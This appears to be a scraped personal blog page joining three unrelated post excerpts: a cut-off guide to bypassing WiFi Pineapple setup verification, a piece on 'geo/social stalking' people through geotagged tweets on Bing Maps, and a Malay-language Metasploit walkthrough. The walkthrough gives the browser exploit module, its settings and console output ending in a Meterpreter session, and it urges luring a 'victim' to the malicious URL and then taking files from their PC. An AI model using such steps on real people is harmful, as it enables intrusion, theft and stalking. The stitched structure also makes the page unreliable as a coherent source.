Recently, I have a cool weekend project to do at home. Kinda spending a good time with my gadgets. 😀 So I decided to install Wifi Pineapple Mark 5 version 2.2.0 on my TP-Link MR3020 version 1.9. Its a straight forward step and you can follow that tutorial on my personal wiki at wiki.khairulazam.net.
After the installation finished, you need to go through the pineapple security measure as a part of setting up pineapple for the first time.
You need to select the correct pattern on that page to match with the blinking LED on your device. But… you know why. because you installing the firmware on different hardware. LOL
So, if you also have and facing the same problem, its okay. With a help from Fikri Fadzil, lets bypass the pattern verification >_<
First, power off you device. After that, unplug the USB pendrive that contain pineapple firmware and plug in it to your computer. I use Ubuntu Desktop to make this step easier.
Geo/Social stalking is fun. Bing Maps has the ability to add various “apps” to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.
Let’s start with somewhere fun, like at German-Malaysian Institute (GMi), Bangi and see who’s tweeting around there.. ;D
First, open www.bing.com/maps/
Then, you can change the view to Aerial View for more nicer look. ;D You may change to other place you want to view e.g. your home, college, workplace
Then, select Map apps options..
Then, select Twitter Maps apps..
Wait for a while for the page to reload the necessary thing (loading tweet around the map you currently viewing)
Korang pernah tak teringin nak guna metasploit? Korang penah tak dapat buat satu session menggunakan metasploit? Aku tak pernah dapat gune metasploit ni.. 🙁
Tapi aku tak pernah mengalah(kecuali perkara2 tertentu).. Akhirnya aku dapat jugak guna.. Dan dapat jugak access ke PC tu.. 🙂
So, meh aku kongsikan macam mana aku dapat buat benda ni.. Pertama, korang install dulu Metasploit. Tak kesahlah versi apa2 pun. Nanti boleh update.
Lepas dah install, jangan lupa untuk update. Supaya korang dapat menggunakan lebih banyak sumber exploit kelak.
Lepas dan install & update, korang run kan Metasploit. Run yang console punya tau. Sebab orang selalu cakap, yang pakai CLI ni lagi efektif. So, korang patut cuba.. 😉
Lepas dah run, korang taipkan macam ni..
use windows/browser/ms06_001_wmf_setabortproc
Itu adalah exploit yang kita akan gunakan.. Exploit ni dia menggunakan browser(IE) untuk menjalankan kerja2 nya..
Lepas dah setkan payload tu, korang assignkan/isikan apa2 yang patut macam LHOST, LPORT, SRVHOST, URL & lain2 yang berkenaan..
set SRVHOST 192.168.56.101 set LHOST 192.168.56.101
Lepas dah setkan suma, taipkan show options untuk tengok balik semua setting2 korang tu.. Ngam ke tak. Apa yang dia require tu korang isikan la kalo tak isi lagi..
Lepas dah setel semua, korang taipkan exploit.. Dia akan keluar lebih kurang macam ni..
[*] Exploit running as background job. msf exploit(ms06_001_wmf_setabortproc) > [-] Handler failed to bind to 192.168.56.101:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z [*] Server started. [*] Sending exploit to 192.168.56.102:1274... [*] Sending stage (748032 bytes) to 192.168.56.102
So, korang kenalah buatkan mangsa korang tu pergi ke URL http://192.168.56.101:8080/asjKYXWBb3z tu.. Barulah menjadi.. Kalo tak memang sampai bila2 lah tak jalan exploit & payload tu.. :p
Lepas korang dah bagi mangsa korang bukak URL tu, korang akan dapat tengok kat msfconsole korang tu flow yang exploit sedang dijalankan ke mangsa yang bukak URL tu..
Kalo exploit korang menjadi, dia akan keluar lebih kurang macam ni..
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800
Haa.. Dah kena! Korang dah ada 1 session ngan dia.. Bole la korang upload/download dan macam2 lagi kat PC dia.. Meh kita tengok..